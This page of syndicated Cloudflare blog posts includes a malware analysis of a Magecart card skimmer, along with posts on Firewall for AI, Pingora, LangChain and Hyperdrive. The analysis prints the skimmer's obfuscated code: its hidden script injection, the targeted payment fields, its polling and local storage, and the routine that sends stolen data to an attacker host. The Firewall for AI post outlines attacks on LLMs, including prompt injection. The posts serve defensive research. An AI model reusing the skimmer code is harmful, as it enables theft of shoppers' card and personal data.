Tag Archives: Developer Platform

Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website

Post Syndicated from Himanshu Anand original https://blog.cloudflare.com/navigating-the-maze-of-magecart

The Cloudflare security research team reviews and evaluates scripts flagged by Cloudflare Page Shield, focusing particularly on those with low scores according to our machine learning (ML) model, as low scores indicate the model thinks they are malicious. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.

This script was not only obfuscated but exhibited some suspicious behavior, setting off alarm bells within our team. Its complexity and the mysterious nature piqued our curiosity, and we decided to delve deeper, to unravel the enigma of what this script was truly up to.

In our quest to decipher the script’s purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.

The Infection Mechanism: A seemingly harmless HTML div element housed a piece of JavaScript, a trojan horse lying in wait.

<div style="display: none; visibility: hidden;">
<script src="//cdn.jsdelivr.at/js/sidebar.min.js"></script>
The script was the conduit for the malicious activities

The devil in the details

The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the snapshot provided by Cloudflare Radar URL Scanner.

Obfuscated script snippet:

function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',

The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at https://jsdelivr[.]at/f[.]php.

Decoding the malicious domain

Before diving deeper into the exact behaviors of a script, examining the hosted domain and its insights could already reveal valuable arguments for overall evaluation. Regarding the hosted domain cdn.jsdelivr.at used in this script:

  • It was registered on 2022-04-14.
  • It impersonates the well-known hosting service jsDelivr, which is hosted at cdn.jsdelivr.net.
  • It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.
  • Previous mentions of this hosting provider, such as in a tweet by @malwrhunterteam, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.

Decoding the malicious script

Data Encoding and Decoding Functions: The script uses two functions, wvnso.jzzys and wvnso.cvdqe, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.

var wvnso = {
  "jzzys": function (_0x5f38f3) {
    return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {
      return String.fromCharCode('0x' + _0x1cf8ee);
  "cvdqe": function (_0x4fdcee) {
    return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {
      return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);

Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The wvnso.cwwez function maps these fields, showing that the attackers had carefully studied the website’s layout.

"cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),

Data Harvesting Logic: The script uses a set of complex functions ( wvnso.uvesz,  wvnso.wsrmf, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects (“harvests”) this data and gets it ready to be sent out (“exfiltrated”).

"uvesz": function (_0x52b255) {
    for (var _0x356fbe = 0x0; _0x356fbe < wvnso.cwwez.length; _0x356fbe++) {
      var _0x25348a = wvnso.cwwez[_0x356fbe];
      if (_0x52b255.hasAttribute(_0x25348a[0x0])) {
        if (typeof _0x25348a[0x1] == "object") {
          var _0xca9068 = '';
          _0x25348a[0x1].forEach(function (_0x450919) {
            var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');
            if (_0x907175 != null && wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length > 0x0) {
              _0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";
          wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();
        } else {
          if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] && wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length > 0x0) {
            if (_0x25348a[0x3] == 'l') {
              wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
            } else {
              if (_0x25348a[0x3] == 'y') {
                wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              } else {
                wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

Stealthy Data Exfiltration: After harvesting the data, the script sends it secretly to the attacker’s server (located at https://jsdelivr[.]at/f[.]php). This process is done in a way that mimics normal Internet traffic, making it hard to detect. It creates an Image HTML element programmatically (not displayed to the user) and sets its src attribute to a specific URL. This URL is the attacker’s server where the stolen data is sent.

"eubtc": function () {
    var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    if (wvnso.pqemy() && !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {
      var _0x49c81a = wvnso.spyed.createElement("IMG");
      _0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;

Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.

Execution Interval: The script is set to activate its data-collecting actions at regular intervals, as shown by the window.setInterval(wvnso.bumdr, 0x1f4) function call. This ensures that it constantly checks for new user input on the site.

window.setInterval(wvnso.bumdr, 0x1f4);

Local Data Storage: Interestingly, the script uses local storage methods (wvnso.hajfd, wvnso.ijltb) to keep the collected data on the user’s device. This could be a way to prevent data loss in case there are issues with the Internet connection or to gather more data before sending it to the server.

"ijltb": function () {
    var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    window.localStorage.setItem("oybwd", _0x19c563);
  "hajfd": function () {
    var _0x1318e0 = window.localStorage.getItem("oybwd");
    if (_0x1318e0 !== null) {
      wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));

This JavaScript code is a sophisticated tool for stealing sensitive information from users. It’s well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.

Proactive detection

Page Shield’s existing machine learning algorithm is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield’s ML automatically flagged the above script as a Magecart type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare customers with Page Shield enabled will soon be able to take further advantage of our latest ML’s superior protection for client-side security. Stay tuned for more details.

What you can do

The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.

We recommend the following actions to enhance security and protect against similar threats. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:

  1. Implement WAF Managed Rule Product: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.
  2. Deploy ML-Based WAF Attack Score: Our ML-based WAF, known as Attack Score, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.
  3. Use Page Shield: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.
  4. Activate Sensitive Data Detection (SDD): SDD alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.


[1]: https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore
[2]: https://www.bizcommunity.com/Article/196/661/241908.html
[3]: https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/

Cloudflare announces Firewall for AI

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/firewall-for-ai

Today, Cloudflare is announcing the development of Firewall for AI, a protection layer that can be deployed in front of Large Language Models (LLMs) to identify abuses before they reach the models.

While AI models, and specifically LLMs, are surging, customers tell us that they are concerned about the best strategies to secure their own LLMs. Using LLMs as part of Internet-connected applications introduces new vulnerabilities that can be exploited by bad actors.

Some of the vulnerabilities affecting traditional web and API applications apply to the LLM world as well, including injections or data exfiltration. However, there is a new set of threats that are now relevant because of the way LLMs work. For example, researchers have recently discovered a vulnerability in an AI collaboration platform that allows them to hijack models and perform unauthorized actions.

Firewall for AI is an advanced Web Application Firewall (WAF) specifically tailored for applications using LLMs. It will comprise a set of tools that can be deployed in front of applications to detect vulnerabilities and provide visibility to model owners. The tool kit will include products that are already part of WAF, such as Rate Limiting and Sensitive Data Detection, and a new protection layer which is currently under development. This new validation analyzes the prompt submitted by the end user to identify attempts to exploit the model to extract data and other abuse attempts. Leveraging the size of Cloudflare network, Firewall for AI runs as close to the user as possible, allowing us to identify attacks early and protect both end user and models from abuses and attacks.

Before we dig into how Firewall for AI works and its full feature set, let’s first examine what makes LLMs unique, and the attack surfaces they introduce. We’ll use the OWASP Top 10 for LLMs as a reference.

Why are LLMs different from traditional applications?

When considering LLMs as Internet-connected applications, there are two main differences compared with more traditional web apps.

First, the way users interact with the product. Traditional apps are deterministic in nature. Think about a bank application — it’s defined by a set of operations (check my balance, make a transfer, etc.). The security of the business operation (and data) can be obtained by controlling the fine set of operations accepted by these endpoints: “GET /balance” or “POST /transfer”.

LLM operations are non-deterministic by design. To start with, LLM interactions are based on natural language, which makes identifying problematic requests harder than matching attack signatures. Additionally, unless a response is cached, LLMs typically provide a different response every time — even if the same input prompt is repeated. This makes limiting the way a user interacts with the application much more difficult. This poses a threat to the user as well, in terms of being exposed to misinformation that weakens the trust in the model.

Second, a big difference is how the application control plane interacts with the data. In traditional applications, the control plane (code) is well separated from the data plane (database). The defined operations are the only way to interact with the underlying data (e.g. show me the history of my payment transactions). This allows security practitioners to focus on adding checks and guardrails to the control plane and thus protecting the database indirectly.

LLMs are different in that the training data becomes part of the model itself through the training process, making it extremely difficult to control how that data is shared as a result of a user prompt. Some architectural solutions are being explored, such as separating LLMs into different levels and segregating data. However, no silver bullet has yet been found.

From a security perspective, these differences allow attackers to craft new attack vectors that can target LLMs and fly under the radar of existing security tools designed for traditional web applications.

OWASP LLM Vulnerabilities

The OWASP foundation released a list of the top 10 classes of vulnerabilities for LLMs, providing a useful framework for thinking about how to secure language models. Some of the threats are reminiscent of the OWASP top 10 for web applications, while others are specific to language models.

Similar to web applications, some of these vulnerabilities can be best addressed when the LLM application is designed, developed, and trained. For example, Training Data Poisoning can be carried out by introducing vulnerabilities in the training data set used to train new models. Poisoned information is then presented to the user when the model is live. Supply Chain Vulnerabilities and Insecure Plugin Design are vulnerabilities introduced in components added to the model, like third-party software packages. Finally, managing authorization and permissions is crucial when dealing with Excessive Agency, where unconstrained models can perform unauthorized actions within the broader application or infrastructure.

Conversely, Prompt Injection, Model Denial of Service, and Sensitive Information Disclosure can be mitigated by adopting a proxy security solution like Cloudflare Firewall for AI. In the following sections, we will give more details about these vulnerabilities and discuss how Cloudflare is optimally positioned to mitigate them.

LLM deployments

Language model risks also depend on the deployment model. Currently, we see three main deployment approaches: internal, public, and product LLMs. In all three scenarios, you need to protect models from abuses, protect any proprietary data stored in the model, and protect the end user from misinformation or from exposure to inappropriate content.

  • Internal LLMs: Companies develop LLMs to support the workforce in their daily tasks. These are considered corporate assets and shouldn’t be accessed by non-employees. Examples include an AI co-pilot trained on sales data and customer interactions used to generate tailored proposals, or an LLM trained on an internal knowledge base that can be queried by engineers.
  • Public LLMs: These are LLMs that can be accessed outside the boundaries of a corporation. Often these solutions have free versions that anyone can use and they are often trained on general or public knowledge. Examples include GPT from OpenAI or Claude from Anthropic.
  • Product LLM: From a corporate perspective, LLMs can be part of a product or service offered to their customers. These are usually self-hosted, tailored solutions that can be made available as a tool to interact with the company resources. Examples include customer support chatbots or Cloudflare AI Assistant.

From a risk perspective, the difference between Product and Public LLMs is about who carries the impact of successful attacks. Public LLMs are considered a threat to data because data that ends up in the model can be accessed by virtually anyone. This is one of the reasons many corporations advise their employees not to use confidential information in prompts for publicly available services. Product LLMs can be considered a threat to companies and their intellectual property if models had access to proprietary information during training (by design or by accident).

Firewall for AI

Cloudflare Firewall for AI will be deployed like a traditional WAF, where every API request with an LLM prompt is scanned for patterns and signatures of possible attacks.

Firewall for AI can be deployed in front of models hosted on the Cloudflare Workers AI platform or models hosted on any other third party infrastructure. It can also be used alongside Cloudflare AI Gateway, and customers will be able to control and set up Firewall for AI using the WAF control plane.

Firewall for AI works like a traditional web application firewall. It is deployed in front of an LLM application and scans every request to identify attack signatures

Prevent volumetric attacks

One of the threats listed by OWASP is Model Denial of Service. Similar to traditional applications, a DoS attack is carried out by consuming an exceptionally high amount of resources, resulting in reduced service quality or potentially increasing the costs of running the model. Given the amount of resources LLMs require to run, and the unpredictability of user input, this type of attack can be detrimental.

This risk can be mitigated by adopting rate limiting policies that control the rate of requests from individual sessions, therefore limiting the context window. By proxying your model through Cloudflare today, you get DDoS protection out of the box. You can also use Rate Limiting and Advanced Rate Limiting to manage the rate of requests allowed to reach your model by setting a maximum rate of request performed by an individual IP address or API key during a session.

Identify sensitive information with Sensitive Data Detection

There are two use cases for sensitive data, depending on whether you own the model and data, or you want to prevent users from sending data into public LLMs.

As defined by OWASP, Sensitive Information Disclosure happens when LLMs inadvertently reveal confidential data in the responses, leading to unauthorized data access, privacy violations, and security breaches. One way to prevent this is to add strict prompt validations. Another approach is to identify when personally identifiable information (PII) leaves the model. This is relevant, for example, when a model was trained with a company knowledge base that may include sensitive information, such asPII (like social security number), proprietary code, or algorithms.

Customers using LLM models behind Cloudflare WAF can employ the Sensitive Data Detection (SDD) WAF managed ruleset to identify certain PII being returned by the model in the response. Customers can review the SDD matches on WAF Security Events. Today, SDD is offered as a set of managed rules designed to scan for financial information (such as credit card numbers) as well as secrets (API keys). As part of the roadmap, we plan to allow customers to create their own custom fingerprints.

The other use case is intended to prevent users from sharing PII or other sensitive information with external LLM providers, such as OpenAI or Anthropic. To protect from this scenario, we plan to expand SDD to scan the request prompt and integrate its output with AI Gateway where, alongside the prompt’s history, we detect if certain sensitive data has been included in the request. We will start by using the existing SDD rules, and we plan to allow customers to write their own custom signatures. Relatedly, obfuscation is another feature we hear a lot of customers talk about. Once available, the expanded SDD will allow customers to obfuscate certain sensitive data in a prompt before it reaches the model. SDD on the request phase is being developed.

Preventing model abuses

Model abuse is a broader category of abuse. It includes approaches like “prompt injection” or submitting requests that generate hallucinations or lead to responses that are inaccurate, offensive, inappropriate, or simply off-topic.

Prompt Injection is an attempt to manipulate a language model through specially crafted inputs, causing unintended responses by the LLM. The results of an injection can vary, from extracting sensitive information to influencing decision-making by mimicking normal interactions with the model. A classic example of prompt injection is manipulating a CV to affect the output of resume screening tools.

A common use case we hear from customers of our AI Gateway is that they want to avoid their application generating toxic, offensive, or problematic language. The risks of not controlling the outcome of the model include reputational damage and harming the end user by providing an unreliable response.

These types of abuse can be managed by adding an additional layer of protection that sits in front of the model. This layer can be trained to block injection attempts or block prompts that fall into categories that are inappropriate.

Prompt and response validation

Firewall for AI will run a series of detections designed to identify prompt injection attempts and other abuses, such as making sure the topic stays within the boundaries defined by the model owner. Like other existing WAF features, Firewall for AI will automatically look for prompts embedded in HTTP requests or allow customers to create rules based on where in the JSON body of the request the prompt can be found.

Once enabled, the Firewall will analyze every prompt and provide a score based on the likelihood that it’s malicious. It will also tag the prompt based on predefined categories. The score ranges from 1 to 99 which indicates the likelihood of a prompt injection, with 1 being the most likely.

Customers will be able to create WAF rules to block or handle requests with a particular score in one or both of these dimensions. You’ll be able to combine this score with other existing signals (like bot score or attack score) to determine whether the request should reach the model or should be blocked. For example, it could be combined with a bot score to identify if the request was malicious and generated by an automated source.

Detecting prompt injections and prompt abuse is part of the scope of Firewall for AI. Early iteration of the product design

Besides the score, we will assign tags to each prompt that can be used when creating rules to prevent prompts belonging to any of these categories from reaching their model. For example, customers will be able to create rules to block specific topics. This includes prompts using words categorized as offensive, or linked to religion, sexual content, or politics, for example.

How can I use Firewall for AI? Who gets this?

Enterprise customers on the Application Security Advanced offering can immediately start using Advanced Rate Limiting and Sensitive Data Detection (on the response phase). Both products can be found in the WAF section of the Cloudflare dashboard. Firewall for AI’s prompt validation feature is currently under development and a beta version will be released in the coming months to all Workers AI users. Sign up to join the waiting list and get notified when the feature becomes available.


Cloudflare is one of the first security providers launching a set of tools to secure AI applications. Using Firewall for AI, customers can control what prompts and requests reach their language models, reducing the risk of abuses and data exfiltration. Stay tuned to learn more about how AI application security is evolving.

Open sourcing Pingora: our Rust framework for building programmable network services

Post Syndicated from Yuchen Wu original https://blog.cloudflare.com/pingora-open-source

Today, we are proud to open source Pingora, the Rust framework we have been using to build services that power a significant portion of the traffic on Cloudflare. Pingora is released under the Apache License version 2.0.

As mentioned in our previous blog post, Pingora is a Rust async multithreaded framework that assists us in constructing HTTP proxy services. Since our last blog post, Pingora has handled nearly a quadrillion Internet requests across our global network.

We are open sourcing Pingora to help build a better and more secure Internet beyond our own infrastructure. We want to provide tools, ideas, and inspiration to our customers, users, and others to build their own Internet infrastructure using a memory safe framework. Having such a framework is especially crucial given the increasing awareness of the importance of memory safety across the industry and the US government. Under this common goal, we are collaborating with the Internet Security Research Group (ISRG) Prossimo project to help advance the adoption of Pingora in the Internet’s most critical infrastructure.

In our previous blog post, we discussed why and how we built Pingora. In this one, we will talk about why and how you might use Pingora.

Pingora provides building blocks for not only proxies but also clients and servers. Along with these components, we also provide a few utility libraries that implement common logic such as event counting, error handling, and caching.

What’s in the box

Pingora provides libraries and APIs to build services on top of HTTP/1 and HTTP/2, TLS, or just TCP/UDP. As a proxy, it supports HTTP/1 and HTTP/2 end-to-end, gRPC, and websocket proxying. (HTTP/3 support is on the roadmap.) It also comes with customizable load balancing and failover strategies. For compliance and security, it supports both the commonly used OpenSSL and BoringSSL libraries, which come with FIPS compliance and post-quantum crypto.

Besides providing these features, Pingora provides filters and callbacks to allow its users to fully customize how the service should process, transform and forward the requests. These APIs will be especially familiar to OpenResty and NGINX users, as many map intuitively onto OpenResty’s “*_by_lua” callbacks.

Operationally, Pingora provides zero downtime graceful restarts to upgrade itself without dropping a single incoming request. Syslog, Prometheus, Sentry, OpenTelemetry and other must-have observability tools are also easily integrated with Pingora as well.

Who can benefit from Pingora

You should consider Pingora if:

Security is your top priority: Pingora is a more memory safe alternative for services that are written in C/C++. While some might argue about memory safety among programming languages, from our practical experience, we find ourselves way less likely to make coding mistakes that lead to memory safety issues. Besides, as we spend less time struggling with these issues, we are more productive implementing new features.

Your service is performance-sensitive: Pingora is fast and efficient. As explained in our previous blog post, we saved a lot of CPU and memory resources thanks to Pingora’s multi-threaded architecture. The saving in time and resources could be compelling for workloads that are sensitive to the cost and/or the speed of the system.

Your service requires extensive customization: The APIs that the Pingora proxy framework provides are highly programmable. For users who wish to build a customized and advanced gateway or load balancer, Pingora provides powerful yet simple ways to implement it. We provide examples in the next section.

Let’s build a load balancer

Let’s explore Pingora’s programmable API by building a simple load balancer. The load balancer will select between and to be the upstream in a round-robin fashion.

First let’s create a blank HTTP proxy.

pub struct LB();

impl ProxyHttp for LB {
    async fn upstream_peer(...) -> Result<Box<HttpPeer>> {

Any object that implements the ProxyHttp trait (similar to the concept of an interface in C++ or Java) is an HTTP proxy. The only required method there is upstream_peer(), which is called for every request. This function should return an HttpPeer which contains the origin IP to connect to and how to connect to it.

Next let’s implement the round-robin selection. The Pingora framework already provides the LoadBalancer with common selection algorithms such as round robin and hashing, so let’s just use it. If the use case requires more sophisticated or customized server selection logic, users can simply implement it themselves in this function.

pub struct LB(Arc<LoadBalancer<RoundRobin>>);

impl ProxyHttp for LB {
    async fn upstream_peer(...) -> Result<Box<HttpPeer>> {
        let upstream = self.0
            .select(b"", 256) // hash doesn't matter for round robin

        // Set SNI to one.one.one.one
        let peer = Box::new(HttpPeer::new(upstream, true, "one.one.one.one".to_string()));

Since we are connecting to an HTTPS server, the SNI also needs to be set. Certificates, timeouts, and other connection options can also be set here in the HttpPeer object if needed.

Finally, let’s put the service in action. In this example we hardcode the origin server IPs. In real life workloads, the origin server IPs can also be discovered dynamically when the upstream_peer() is called or in the background. After the service is created, we just tell the LB service to listen to In the end we created a Pingora server, and the server will be the process which runs the load balancing service.

fn main() {
    let mut upstreams = LoadBalancer::try_from_iter(["", ""]).unwrap();

    let mut lb = pingora_proxy::http_proxy_service(&my_server.configuration, LB(upstreams));

    let mut my_server = Server::new(None).unwrap();

Let’s try it out:

curl -svo /dev/null
> GET / HTTP/1.1
> Host:
> User-Agent: curl/7.88.1
> Accept: */*
< HTTP/1.1 403 Forbidden

We can see that the proxy is working, but the origin server rejects us with a 403. This is because our service simply proxies the Host header,, set by curl, which upsets the origin server. How do we make the proxy correct that? This can simply be done by adding another filter called upstream_request_filter. This filter runs on every request after the origin server is connected and before any HTTP request is sent. We can add, remove or change http request headers in this filter.

async fn upstream_request_filter(…, upstream_request: &mut RequestHeader, …) -> Result<()> {
    upstream_request.insert_header("Host", "one.one.one.one")

Let’s try again:

curl -svo /dev/null
< HTTP/1.1 200 OK

This time it works! The complete example can be found here.

Below is a very simple diagram of how this request flows through the callback and filter we used in this example. The Pingora proxy framework currently provides more filters and callbacks at different stages of a request to allow users to modify, reject, route and/or log the request (and response).

Behind the scenes, the Pingora proxy framework takes care of connection pooling, TLS handshakes, reading, writing, parsing requests and any other common proxy tasks so that users can focus on logic that matters to them.

Open source, present and future

Pingora is a library and toolset, not an executable binary. In other words, Pingora is the engine that powers a car, not the car itself. Although Pingora is production-ready for industry use, we understand a lot of folks want a batteries-included, ready-to-go web service with low or no-code config options. Building that application on top of Pingora will be the focus of our collaboration with the ISRG to expand Pingora’s reach. Stay tuned for future announcements on that project.

Other caveats to keep in mind:

  • Today, API stability is not guaranteed. Although we will try to minimize how often we make breaking changes, we still reserve the right to add, remove, or change components such as request and response filters as the library evolves, especially during this pre-1.0 period.
  • Support for non-Unix based operating systems is not currently on the roadmap. We have no immediate plans to support these systems, though this could change in the future.

How to contribute

Feel free to raise bug reports, documentation issues, or feature requests in our GitHub issue tracker. Before opening a pull request, we strongly suggest you take a look at our contribution guide.


In this blog we announced the open source of our Pingora framework. We showed that Internet entities and infrastructure can benefit from Pingora’s security, performance and customizability. We also demonstrated how easy it is to use Pingora and how customizable it is.

Whether you’re building production web services or experimenting with network technologies we hope you find value in Pingora. It’s been a long journey, but sharing this project with the open source community has been a goal from the start. We’d like to thank the Rust community as Pingora is built with many great open-sourced Rust crates. Moving to a memory safe Internet may feel like an impossible journey, but it’s one we hope you join us on.

LangChain Support for Workers AI, Vectorize and D1

Post Syndicated from Ricky Robinett http://blog.cloudflare.com/author/ricky/ original https://blog.cloudflare.com/langchain-support-for-workers-ai-vectorize-and-d1

During Developer Week, we announced LangChain support for Cloudflare Workers. Langchain is an open-source framework that allows developers to create powerful AI workflows by combining different models, providers, and plugins using a declarative API — and it dovetails perfectly with Workers for creating full stack, AI-powered applications.

Since then, we’ve been working with the LangChain team on deeper integration of many tools across Cloudflare’s developer platform and are excited to share what we’ve been up to.

Today, we’re announcing five new key integrations with LangChain:

  1. Workers AI Chat Models: This allows you to use Workers AI text generation to power your chat model within your LangChain.js application.
  2. Workers AI Instruct Models: This allows you to use Workers AI models fine-tuned for instruct use-cases, such as Mistral and CodeLlama, inside your Langchain.js application.
  3. Text Embeddings Models: If you’re working with text embeddings, you can now use Workers AI text embeddings with LangChain.js.
  4. Vectorize Vector Store: When working with a Vector database and LangChain.js, you now have the option of using Vectorize, Cloudflare’s powerful vector database.
  5. Cloudflare D1-Backed Chat Memory: For longer-term persistence across chat sessions, you can swap out LangChain’s default in-memory chatHistory that backs chat memory classes like BufferMemory for a Cloudflare D1 instance.

With the addition of these five Cloudflare AI tools into LangChain, developers have powerful new primitives to integrate into new and existing AI applications. With LangChain’s expressive tooling for mixing and matching AI tools and models, you can use Vectorize, Cloudflare AI’s text embedding and generation models, and Cloudflare D1 to build a fully-featured AI application in just a few lines of code.

This is a full persistent chat app powered by an LLM in 10 lines of code–deployed to @Cloudflare Workers, powered by @LangChainAI and @Cloudflare D1.

You can even pass in a unique sessionId and have completely user/session-specific conversations 🤯 https://t.co/le9vbMZ7Mc pic.twitter.com/jngG3Z7NQ6

— Kristian Freeman (@kristianf_) September 20, 2023

Getting started with a Cloudflare + LangChain + Nuxt Multi-source Chatbot template

You can get started by using LangChain’s Cloudflare Chatbot template: https://github.com/langchain-ai/langchain-cloudflare-nuxt-template

This application shows how various pieces of Cloudflare Workers AI fit together and expands on the concept of retrieval augmented generation (RAG) to build a conversational retrieval system that can route between multiple data sources, choosing the one more relevant based on the incoming question. This method helps cut down on distraction from off-topic documents getting pulled in by a vector store’s similarity search, which could occur if only a single database were used.

The base version runs entirely on the Cloudflare Workers AI stack with the Llama 2-7B model. It uses:

  • A chat variant of Llama 2-7B run on Cloudflare Workers AI
  • A Cloudflare Workers AI embeddings model
  • Two different Cloudflare Vectorize DBs (though you could add more!)
  • Cloudflare Pages for hosting
  • LangChain.js for orchestration
  • Nuxt + Vue for the frontend

The two default data sources are a PDF detailing some of Cloudflare’s features and a blog post by Lilian Weng at OpenAI that talks about autonomous agents.

The bot will classify incoming questions as being about Cloudflare, AI, or neither, and draw on the corresponding data source for more targeted results. Everything is fully customizable – you can change the content of the ingested data, the models used, and all prompts!

And if you have access to the LangSmith beta, the app also has tracing set up so that you can easily see and debug each step in the application.

We can’t wait to see what you build

We can’t wait to see what you all build with LangChain and Cloudflare. Come tell us about it in discord or on our community forums.

Hyperdrive: making databases feel like they’re global

Post Syndicated from Matt Silverlock original http://blog.cloudflare.com/hyperdrive-making-regional-databases-feel-distributed/

Hyperdrive: making databases feel like they’re global

Hyperdrive: making databases feel like they’re global

Hyperdrive makes accessing your existing databases from Cloudflare Workers, wherever they are running, hyper fast. You connect Hyperdrive to your database, change one line of code to connect through Hyperdrive, and voilà: connections and queries get faster (and spoiler: you can use it today).

In a nutshell, Hyperdrive uses our global network to speed up queries to your existing databases, whether they’re in a legacy cloud provider or with your favorite serverless database provider; dramatically reduces the latency incurred from repeatedly setting up new database connections; and caches the most popular read queries against your database, often avoiding the need to go back to your database at all.

Without Hyperdrive, that core database — the one with your user profiles, product inventory, or running your critical web app — sitting in the us-east1 region of a legacy cloud provider is going to be really slow to access for users in Paris, Singapore and Dubai and slower than it should be for users in Los Angeles or Vancouver. With each round trip taking up to 200ms, it’s easy to burn up to a second (or more!) on the multiple round-trips needed just to set up a connection, before you’ve even made the query for your data. Hyperdrive is designed to fix this.

